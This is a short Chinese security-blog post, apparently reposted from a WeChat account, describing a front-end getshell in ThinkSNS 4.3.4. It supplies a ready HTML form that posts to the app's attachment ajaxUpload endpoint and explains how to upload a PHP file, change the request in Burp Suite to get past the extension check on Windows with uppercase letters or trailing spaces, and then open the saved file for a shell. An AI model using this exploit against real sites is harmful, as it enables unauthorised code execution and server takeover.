Thinksns前台Getshell

  • A+
所属分类:安全文章

这个漏洞只能在windows下使用,因为Linux下的后缀名很严格,所以不能用大写以及加空格来绕过。
先构造一个上传表单:

<html><body>

<form action="http://localhost/thinksns434/index.php?app=public&mod=attach&act=ajaxUpload" method="post" 

enctype="multipart/form-data">

<label for="file">Filename:</label>

<input type="file" name="upfile" id="file" /> <br /><input type="submit" name="submit" value="Submit" /></form>

</body>

</html>

然后呢,随便选择一个php文件,开始上传,同时打开Burpsuite开始抓包改包,其中要更改的地方如下:

Thinksns前台Getshell

然后就可以看到回显了上传文件的保存位置了,如图:

Thinksns前台Getshell

我们试着访问一下,成功getshell:

Thinksns前台Getshell

本文始发于微信公众号(飓风网络安全):Thinksns前台Getshell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: